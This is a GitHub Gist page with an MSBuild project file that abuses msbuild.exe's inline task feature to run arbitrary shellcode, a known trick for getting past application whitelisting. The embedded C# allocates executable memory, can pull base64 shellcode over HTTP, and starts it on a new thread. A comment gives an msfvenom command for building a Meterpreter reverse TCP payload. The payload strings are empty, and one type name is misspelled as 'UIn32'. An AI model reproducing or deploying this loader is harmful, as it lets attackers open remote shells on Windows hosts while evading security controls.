Last active
November 8, 2019 16:33
-
-
Save UserExistsError/4741595c1b152a441d5aabfeb6bf6e21 to your computer and use it in GitHub Desktop.
msbuild.exe run shellcode
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-inline-tasks?view=vs-2017 --> | |
| <!-- original work by @subTee on twitter --> | |
| <Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <UsingTask TaskName="RunShellCode" TaskFactory="CodeTaskFactory" AssemblyFile="C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" > | |
| <ParameterGroup /> | |
| <Task> | |
| <Using Namespace="System" /> | |
| <Code Type="Class" Language="cs"> | |
| <![CDATA[ | |
| using System; | |
| using System.IO; | |
| using System.Net; | |
| using Microsoft.Build.Framework; | |
| using Microsoft.Build.Utilities; | |
| using System.Runtime.InteropServices; | |
| public class RunShellCode: Task, ITask | |
| /* https://docs.microsoft.com/en-us/dotnet/api/microsoft.build.framework.itask?view=netframework-4.7.2 */ | |
| { | |
| [DllImport("kernel32.dll")] | |
| public static extern IntPtr VirtualAlloc(UInt32 addr, UInt32 size, UInt32 flags, UInt32 protect); | |
| [DllImport("kernel32.dll")] | |
| public static extern IntPtr CreateThread(UInt32 attrs, UInt32 stack, IntPtr start, UIn32 param, UInt32 flags, ref UInt32 tidPtr); | |
| [DllImport("kernel32.dll")] | |
| public static extern UInt32 WaitForSingleObject(IntPtr hThread, UInt32 dwWait); | |
| private byte[] GetShellCodeHttp() | |
| { | |
| string url = "http://localhost:8000/"; | |
| if (System.Environment.Is64BitProcess) | |
| url += "64"; | |
| else | |
| url += "32"; | |
| Console.WriteLine("Requesting base64 shellcode from {0}", url); | |
| WebRequest request = WebRequest.Create(url); | |
| WebResponse response = request.GetResponse(); | |
| Stream stream = response.GetResponseStream(); | |
| StreamReader reader = new StreamReader(stream); | |
| string shellcode = reader.ReadToEnd().Replace("\n", "").Replace("\r", ""); | |
| reader.Close(); | |
| response.Close(); | |
| return System.Convert.FromBase64String(shellcode); | |
| } | |
| private byte[] GetShellCode() | |
| { | |
| if (System.Environment.Is64BitProcess) | |
| return System.Convert.FromBase64String(""); | |
| return System.Convert.FromBase64String(""); | |
| } | |
| public override bool Execute() | |
| { | |
| /* will run 32 and 64 bit shellcode | |
| msfvenom -f raw windows/x64/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=4444 | base64 -w 0 | |
| */ | |
| byte[] shellcode = GetShellCode(); | |
| Console.WriteLine(String.Format("Process bits: {0}", System.Environment.Is64BitProcess ? 64 : 32)); | |
| Console.WriteLine(String.Format("Shellcode length = {0}", shellcode.Length)); | |
| // allocate unmanaged memory buffer for our shellcode | |
| IntPtr rwx = VirtualAlloc(0, (UInt32)shellcode.Length, 0x3000, 0x40); | |
| Console.WriteLine(String.Format("Allocated memory at 0x{0:x}", rwx.ToInt64())); | |
| // copy from bytes object to unmanaged memory | |
| Marshal.Copy(shellcode, 0, rwx, shellcode.Length); | |
| // create a new thread to target the shellcode | |
| UInt32 tid = 0; | |
| Console.WriteLine("Creating thread..."); | |
| IntPtr handle = CreateThread(0, 0, rwx, 0, 0, ref tid); | |
| Console.WriteLine(String.Format("Waiting on thread 0x{0:x}", tid)); | |
| // wait for shellcode to exit | |
| WaitForSingleObject(handle, 0xffffffff); | |
| return false; | |
| } | |
| } | |
| ]]> | |
| </Code> | |
| </Task> | |
| </UsingTask> | |
| <Target Name="Run" > | |
| <RunShellCode /> | |
| </Target> | |
| </Project> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment